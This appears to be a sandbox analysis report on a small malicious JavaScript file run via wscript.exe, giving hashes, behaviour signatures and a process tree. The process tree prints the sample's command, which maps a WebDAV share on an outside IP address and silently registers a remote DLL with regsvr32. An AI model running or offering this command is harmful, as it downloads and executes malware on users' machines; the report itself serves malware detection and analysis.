Analysis
-
max time kernel
93s -
max time network
124s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
23/07/2024, 06:52
Static task
static1
Behavioral task
behavioral1
Sample
17300219471184123210.js
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
17300219471184123210.js
Resource
win10v2004-20240709-en
General
-
Target
17300219471184123210.js
-
Size
4KB
-
MD5
7fd5217b4985c2d7227272a3dc3c26dc
-
SHA1
b802b01e634e8441abba56e12a5d0a2ec8f54380
-
SHA256
77911e1aaeba710e76c727862d90cf856c67a3273378a6292d77ddd02720c5a4
-
SHA512
430fe88c969e259301b7f1359ca987d80901d33b6001091a9825e8636e562facb5aada089813b60ae542db0c2588ef8544ce5a267b37f768258b3dd466db3f93
-
SSDEEP
48:rwJu6xlh98/6U4VsDxaxPeV1vbaxkSnzI5tKHE/DyTAkK2Mu/iJtKHE/DyT/P/5W:rwEwDUFYVFDnjHEbEAkJMwHEbExPPG
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 1608 wrote to memory of 1580 1608 wscript.exe 84 PID 1608 wrote to memory of 1580 1608 wscript.exe 84 PID 1580 wrote to memory of 728 1580 cmd.exe 86 PID 1580 wrote to memory of 728 1580 cmd.exe 86
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\17300219471184123210.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1608 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\263351605719340.dll2⤵
- Suspicious use of WriteProcessMemory
PID:1580 -
C:\Windows\system32\net.exenet use \\45.9.74.36@8888\davwwwroot\3⤵PID:728
-
-